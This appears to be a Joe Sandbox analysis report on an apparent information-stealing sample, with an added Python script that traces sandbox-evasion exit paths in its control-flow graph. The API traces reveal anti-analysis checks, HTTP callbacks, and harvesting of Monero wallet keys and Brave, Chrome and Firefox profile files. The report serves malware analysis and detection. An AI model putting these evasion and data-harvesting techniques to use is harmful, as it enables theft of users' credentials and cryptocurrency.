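The control_flow_graph lines in this report are the plain-text form of the rendered graph: each basic block is printed as an id, an address range and the API calls made in the block, followed by the edges between block ids. The following Python, an added example rather than anything from Joe Sandbox or the sample, parses that text and enumerates the simple paths from the entry block to every block that calls ExitProcess, so the API sequence that gates execution can be read off directly: for the routine at 00ED6ABA the two signatures are the bare CloseHandle/ExitProcess exit and OpenEventA/CreateEventA/CloseHandle/ExitProcess, with the CloseHandle/Sleep block forming the loop back to the OpenEventA retry, and for 00EC1220 every path to ExitProcess passes through GlobalMemoryStatusEx. The two graph strings are copied from the dumps on this page; the assumption that block ids are declared in increasing order is taken from those dumps.

```python
import re
from collections import defaultdict

# A block address token looks like "ed6aba" or "ed6aba-ed6ad7"; an edge like "1454->1460".
ADDR_RE = re.compile(r"^[0-9a-f]{5,8}(?:-[0-9a-f]{5,8})?$")
EDGE_RE = re.compile(r"^(\d+)->(\d+)$")

# Constructed samples copied from the control_flow_graph dumps in this report:
# the single-instance event gate at 00ED6ABA and the memory-size check at 00EC1220.
CFG_EVENT_GATE = (
    "control_flow_graph 1450 ed6af3 1451 ed6b0a 1450->1451 "
    "1453 ed6b0c-ed6b22 call ed6920 call ed5b10 CloseHandle ExitProcess 1451->1453 "
    "1454 ed6aba-ed6ad7 call edaad0 OpenEventA 1451->1454 "
    "1460 ed6ad9-ed6af1 call edaad0 CreateEventA 1454->1460 "
    "1461 ed6af5-ed6b04 CloseHandle Sleep 1454->1461 1460->1453 1461->1451"
)
CFG_MEMORY_CHECK = (
    "control_flow_graph 1436 ec1220-ec1247 call ed89b0 GlobalMemoryStatusEx "
    "1439 ec1249-ec1271 call edda00 * 2 1436->1439 1440 ec1273-ec127a 1436->1440 "
    "1442 ec1281-ec1285 1439->1442 1440->1442 1444 ec129a-ec129d 1442->1444 "
    "1445 ec1287 1442->1445 1446 ec1289-ec1290 1445->1446 "
    "1447 ec1292-ec1294 ExitProcess 1445->1447 1446->1444 1446->1447"
)


def parse_cfg(text):
    """Return (nodes, edges, order) for one control_flow_graph dump.

    nodes: id -> {"range": "ed6aba-ed6ad7", "labels": [tokens printed for the block]}
    edges: id -> [successor ids]; order: ids in declaration order.
    """
    tokens = text.split()
    nodes, edges, order = {}, defaultdict(list), []
    current = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE_RE.match(tok)
        if edge:
            edges[int(edge.group(1))].append(int(edge.group(2)))
            i += 1
            continue
        # A number followed by an address token opens a new block. Ids are declared in
        # increasing order in these dumps (assumption taken from the report), which keeps
        # a repeat count such as the "3" in "call ed8d00 * 3" from being read as an id.
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
        if tok.isdigit() and (current is None or int(tok) > current) and ADDR_RE.match(nxt):
            current = int(tok)
            nodes[current] = {"range": nxt, "labels": []}
            order.append(current)
            i += 2
            continue
        if current is not None:
            nodes[current]["labels"].append(tok)
        i += 1
    return nodes, edges, order


def api_calls(node):
    """API names on a block; 'call <addr>' (internal function), '*' and repeat counts are dropped."""
    out, skip = [], False
    for lab in node["labels"]:
        if skip:                      # the token after 'call' is an internal function address
            skip = False
            continue
        if lab == "call":
            skip = True
            continue
        if lab == "*" or lab.isdigit() or ADDR_RE.match(lab):
            continue
        out.append(lab)
    return out


def entry_block(edges, order):
    """First declared block with no incoming edge (falls back to the first declared)."""
    incoming = {s for succs in edges.values() for s in succs}
    return next((n for n in order if n not in incoming), order[0])


def paths_to_api(nodes, edges, order, api="ExitProcess"):
    """Simple paths from the entry block to every block calling `api`, each paired
    with the sequence of API calls seen along the way."""
    targets = {n for n in nodes if api in api_calls(nodes[n])}
    found = []

    def walk(node, path):
        if node in targets:
            found.append((path, [a for n in path for a in api_calls(nodes[n])]))
            return
        for succ in edges.get(node, []):
            if succ not in path:      # never revisit a block, so the Sleep retry loop stays finite
                walk(succ, path + [succ])

    start = entry_block(edges, order)
    walk(start, [start])
    return found


def exit_signatures(text, api="ExitProcess"):
    """Distinct API sequences that reach `api`, from a raw dump string."""
    return sorted({" ".join(seq) for _, seq in paths_to_api(*parse_cfg(text), api=api)})


if __name__ == "__main__":
    for name, text in (("00ED6ABA", CFG_EVENT_GATE), ("00EC1220", CFG_MEMORY_CHECK)):
        nodes, edges, order = parse_cfg(text)
        print(name)
        for path, seq in paths_to_api(nodes, edges, order):
            print("  " + " -> ".join(nodes[n]["range"] for n in path) + " : " + " ".join(seq))
```

The path enumeration treats the graph as the report prints it, so blocks the tracer marked Not Executed are still followed; that is the point when the question is which check could have terminated the sample rather than which one did.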

                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EC4839
                                • InternetCrackUrlA.WININET(00000000,00000000), ref: 00EC4849
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: CrackInternetlstrlen
                                • String ID: <
                                • API String ID: 1274457161-4251816714
                                • Opcode ID: c50eef585ff125dc8e5d32540d1938b696541bc66ed9da60a45c15894b8cea4b
                                • Instruction ID: be5d9375714ddb877910f5914646517304440eaaa5e4d8f6dd1086a6bf3808b8
                                • Opcode Fuzzy Hash: c50eef585ff125dc8e5d32540d1938b696541bc66ed9da60a45c15894b8cea4b
                                • Instruction Fuzzy Hash: 4F215EB1D00209ABDF14DFA4EC45ADE7B74FF04320F109625F925B7281EB706A0ACB81

                                APIs
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                  • Part of subcall function 00EC6280: InternetOpenA.WININET(00EE0DFE,00000001,00000000,00000000,00000000), ref: 00EC62E1
                                  • Part of subcall function 00EC6280: StrCmpCA.SHLWAPI(?,01B8E220), ref: 00EC6303
                                  • Part of subcall function 00EC6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EC6335
                                  • Part of subcall function 00EC6280: HttpOpenRequestA.WININET(00000000,GET,?,01B8DA10,00000000,00000000,00400100,00000000), ref: 00EC6385
                                  • Part of subcall function 00EC6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00EC63BF
                                  • Part of subcall function 00EC6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EC63D1
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00ED5228
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                 • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Similarity
                                • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                • String ID: ERROR$ERROR
                                • API String ID: 3287882509-2579291623
                                • Opcode ID: ec0acd8ffbfc6cb678e7b1a2949ad7e5e2bf510e3618a90c44185990e0f3a1d3
                                • Instruction ID: 2cd4ac1931a053862da47214513487fd5b38d990b9214edd8ee62c2bc656c70c
                                • Opcode Fuzzy Hash: ec0acd8ffbfc6cb678e7b1a2949ad7e5e2bf510e3618a90c44185990e0f3a1d3
                                • Instruction Fuzzy Hash: 75112131900148ABCB18FF60DD56EED73B8EF50300F44516AF81A66292EF70AB07C691
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00EC112B
                                • VirtualAllocExNuma.KERNEL32(00000000), ref: 00EC1132
                                • ExitProcess.KERNEL32 ref: 00EC1143
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                 • Associated: the same fourteen .sdmp regions (00EC0000 to 01574000) listed for the function above
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Similarity
                                • API ID: Process$AllocCurrentExitNumaVirtual
                                • String ID:
                                • API String ID: 1103761159-0
                                • Opcode ID: d88a8e8744bfd9ec89c3272cea82b0335ca0f827af4f54b019785812b769d10f
                                • Instruction ID: 97ecfab70612d0551d4a9b12fa60fdbce998406d5db83f3bf98ef69f416d1f29
                                • Opcode Fuzzy Hash: d88a8e8744bfd9ec89c3272cea82b0335ca0f827af4f54b019785812b769d10f
                                • Instruction Fuzzy Hash: 4BE08670D45308FBE7246BA0AD0AF0876B8AF04B02F104095F709771C1C6F526419798
                                APIs
                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00EC10B3
                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00EC10F7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                 • Associated: the same fourteen .sdmp regions (00EC0000 to 01574000) listed for the function above
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Similarity
                                • API ID: Virtual$AllocFree
                                • String ID:
                                • API String ID: 2087232378-0
                                • Opcode ID: cfff7aa77af324156223aaa624bba558a0a4e48b5713947d2465e3956fc72ec1
                                • Instruction ID: ba7f5d838f066ffc66f19302fcd4a02512f7d3b569123accf21d9f852d1125a4
                                • Opcode Fuzzy Hash: cfff7aa77af324156223aaa624bba558a0a4e48b5713947d2465e3956fc72ec1
                                • Instruction Fuzzy Hash: 31F0E271A41308BBE7149AA4AD5AFABB7E8E709B15F302458F504E3280D5729F40CBA0
                                APIs
                                  • Part of subcall function 00ED78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00ED7910
                                  • Part of subcall function 00ED78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00ED7917
                                  • Part of subcall function 00ED78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00ED792F
                                  • Part of subcall function 00ED7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00EC11B7), ref: 00ED7880
                                  • Part of subcall function 00ED7850: RtlAllocateHeap.NTDLL(00000000), ref: 00ED7887
                                  • Part of subcall function 00ED7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00ED789F
                                • ExitProcess.KERNEL32 ref: 00EC11C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                 • Associated: the same fourteen .sdmp regions (00EC0000 to 01574000) listed for the function above
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Similarity
                                • API ID: Heap$Process$AllocateName$ComputerExitUser
                                • String ID:
                                • API String ID: 3550813701-0
                                • Opcode ID: b9f0b50e322e3d0ba96c6cd156ba1606a406f1a2c9d2f07aa5629837a9c98c28
                                • Instruction ID: a51dbd862047ad33d8b38f73b7a83e2f1fc62558b157d629c3f63c3559d9515c
                                • Opcode Fuzzy Hash: b9f0b50e322e3d0ba96c6cd156ba1606a406f1a2c9d2f07aa5629837a9c98c28
                                • Instruction Fuzzy Hash: F2E0ECA5D1431152CA1873B4BD0AB2A32DC9B15349F08242ABA05A3247FA6AE8428665
                                APIs
                                • wsprintfA.USER32 ref: 00ED38CC
                                • FindFirstFileA.KERNEL32(?,?), ref: 00ED38E3
                                • lstrcat.KERNEL32(?,?), ref: 00ED3935
                                • StrCmpCA.SHLWAPI(?,00EE0F70), ref: 00ED3947
                                • StrCmpCA.SHLWAPI(?,00EE0F74), ref: 00ED395D
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00ED3C67
                                • FindClose.KERNEL32(000000FF), ref: 00ED3C7C
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                 • Associated: the same fourteen .sdmp regions (00EC0000 to 01574000) listed for the function above
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Similarity
                                • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                • API String ID: 1125553467-2524465048
                                • Opcode ID: 0e9966ff2dc96f031a54658f806963257f58978f3922d2745355e803ae010537
                                • Instruction ID: fb0125aa11bdbb7c468afaa646c2742b151785b7766c718a5c85c43658a17bf3
                                • Opcode Fuzzy Hash: 0e9966ff2dc96f031a54658f806963257f58978f3922d2745355e803ae010537
                                • Instruction Fuzzy Hash: 1EA151B2A003089BDB35DB64DC85FEA73B8FF88300F044599A51DA7145EBB19B85CF62
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                • FindFirstFileA.KERNEL32(00000000,?,00EE0B32,00EE0B2B,00000000,?,?,?,00EE13F4,00EE0B2A), ref: 00ECBEF5
                                • StrCmpCA.SHLWAPI(?,00EE13F8), ref: 00ECBF4D
                                • StrCmpCA.SHLWAPI(?,00EE13FC), ref: 00ECBF63
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00ECC7BF
                                • FindClose.KERNEL32(000000FF), ref: 00ECC7D1
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                 • Associated: the same fourteen .sdmp regions (00EC0000 to 01574000) listed for the function above
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                • API String ID: 3334442632-726946144
                                • Opcode ID: 6a5bc259f44482ea29a87d150feaca3b7efa6dd65098ac956377e74a20e1d206
                                • Instruction ID: d648c5f8a59ba8177503ff8557441d64b1b8b7e1567aa5f704a6e06a9f992579
                                • Opcode Fuzzy Hash: 6a5bc259f44482ea29a87d150feaca3b7efa6dd65098ac956377e74a20e1d206
                                • Instruction Fuzzy Hash: 054245729001085BCB18FB70DD56EED73BDEF44300F44556AF90AB6281EE359B4ACB92
                                APIs
                                • wsprintfA.USER32 ref: 00ED492C
                                • FindFirstFileA.KERNEL32(?,?), ref: 00ED4943
                                • StrCmpCA.SHLWAPI(?,00EE0FDC), ref: 00ED4971
                                • StrCmpCA.SHLWAPI(?,00EE0FE0), ref: 00ED4987
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00ED4B7D
                                • FindClose.KERNEL32(000000FF), ref: 00ED4B92
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                 • Associated: the same fourteen .sdmp regions (00EC0000 to 01574000) listed for the function above
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\%s$%s\%s$%s\*
                                • API String ID: 180737720-445461498
                                • Opcode ID: b87acb3a315d382bc77ec8970b7e96db99202164a0ad99a8512a5ef493aaaae0
                                • Instruction ID: 9734229a052d8aaf151efa658316acde7dc0cb62b3e78b5783cd95bc4124d8ef
                                • Opcode Fuzzy Hash: b87acb3a315d382bc77ec8970b7e96db99202164a0ad99a8512a5ef493aaaae0
                                • Instruction Fuzzy Hash: 016165B1900218ABCB35EBA0EC45FEA73BCFF58301F048599B509A6145EB71DB85CF91
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00ED4580
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED4587
                                • wsprintfA.USER32 ref: 00ED45A6
                                • FindFirstFileA.KERNEL32(?,?), ref: 00ED45BD
                                • StrCmpCA.SHLWAPI(?,00EE0FC4), ref: 00ED45EB
                                • StrCmpCA.SHLWAPI(?,00EE0FC8), ref: 00ED4601
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00ED468B
                                • FindClose.KERNEL32(000000FF), ref: 00ED46A0
                                • lstrcat.KERNEL32(?,01B8E360), ref: 00ED46C5
                                • lstrcat.KERNEL32(?,01B8D378), ref: 00ED46D8
                                • lstrlen.KERNEL32(?), ref: 00ED46E5
                                • lstrlen.KERNEL32(?), ref: 00ED46F6
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                 • Associated: the same fourteen .sdmp regions (00EC0000 to 01574000) listed for the function above
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Similarity
                                • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                • String ID: %s\%s$%s\*
                                • API String ID: 671575355-2848263008
                                • Opcode ID: 8e110c0e155904c6ed6ac5b110f814982b4ea7d637261d94e6acfabe1b5c9c69
                                • Instruction ID: 6a47af1b0982da7e60de7ab711326ecdbbb2d2cdfe70f0620c11e4b58d58c233
                                • Opcode Fuzzy Hash: 8e110c0e155904c6ed6ac5b110f814982b4ea7d637261d94e6acfabe1b5c9c69
                                • Instruction Fuzzy Hash: DE5162B69003189BC725EB70EC89FE9737CEF58300F405599B61AA2184EBB59BC5CF91
                                APIs
                                • wsprintfA.USER32 ref: 00ED3EC3
                                • FindFirstFileA.KERNEL32(?,?), ref: 00ED3EDA
                                • StrCmpCA.SHLWAPI(?,00EE0FAC), ref: 00ED3F08
                                • StrCmpCA.SHLWAPI(?,00EE0FB0), ref: 00ED3F1E
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00ED406C
                                • FindClose.KERNEL32(000000FF), ref: 00ED4081
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                 • Associated: the same fourteen .sdmp regions (00EC0000 to 01574000) listed for the function above
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\%s
                                • API String ID: 180737720-4073750446
                                • Opcode ID: fdf20b9c3c919144a30d032d9dcff906b6626ef03940131242ce9ac515839b20
                                • Instruction ID: 0e78bac920c929196d840b64c1d3d9e4beb4a2955d4e7746184db4b5081b108e
                                • Opcode Fuzzy Hash: fdf20b9c3c919144a30d032d9dcff906b6626ef03940131242ce9ac515839b20
                                • Instruction Fuzzy Hash: BC5176B6900318ABCB25EBB0DC45EEA73BCFF48300F005599B659A2140DBB5DB86CF51
                                APIs
                                • wsprintfA.USER32 ref: 00ECED3E
                                • FindFirstFileA.KERNEL32(?,?), ref: 00ECED55
                                • StrCmpCA.SHLWAPI(?,00EE1538), ref: 00ECEDAB
                                • StrCmpCA.SHLWAPI(?,00EE153C), ref: 00ECEDC1
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00ECF2AE
                                • FindClose.KERNEL32(000000FF), ref: 00ECF2C3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\*.*
                                • API String ID: 180737720-1013718255
                                • Opcode ID: a451585c04659712bfafb3cdd2b6be5d758b6457e212f1060dea55eaef275929
                                • Instruction ID: a0743fd4dc46d0b47ddf9163b7f4efc57e77b04865a998cc490efd27e83e5b86
                                • Opcode Fuzzy Hash: a451585c04659712bfafb3cdd2b6be5d758b6457e212f1060dea55eaef275929
                                • Instruction Fuzzy Hash: 75E130769112589ADB18EB20DC96EEE7378EF54300F4451BAB40A72152EE306F8BDF51
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00EE15B8,00EE0D96), ref: 00ECF71E
                                • StrCmpCA.SHLWAPI(?,00EE15BC), ref: 00ECF76F
                                • StrCmpCA.SHLWAPI(?,00EE15C0), ref: 00ECF785
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00ECFAB1
                                • FindClose.KERNEL32(000000FF), ref: 00ECFAC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID: prefs.js
                                • API String ID: 3334442632-3783873740
                                • Opcode ID: 9a94df1c399a9f9e0ade3eff626789909db84444ef12420f59764b3d270a56d8
                                • Instruction ID: 65236e63a33b0e2d27d793cf8d4d25fe38795ec1eaff8c7870f8758367641d1e
                                • Opcode Fuzzy Hash: 9a94df1c399a9f9e0ade3eff626789909db84444ef12420f59764b3d270a56d8
                                • Instruction Fuzzy Hash: 1FB135769002589BCB28EF60DD55FED73B9EF54300F4491BAE80AA7241EF315B4ACB91
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00EE510C,?,?,?,00EE51B4,?,?,00000000,?,00000000), ref: 00EC1923
                                • StrCmpCA.SHLWAPI(?,00EE525C), ref: 00EC1973
                                • StrCmpCA.SHLWAPI(?,00EE5304), ref: 00EC1989
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00EC1D40
                                • DeleteFileA.KERNEL32(00000000), ref: 00EC1DCA
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00EC1E20
                                • FindClose.KERNEL32(000000FF), ref: 00EC1E32
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
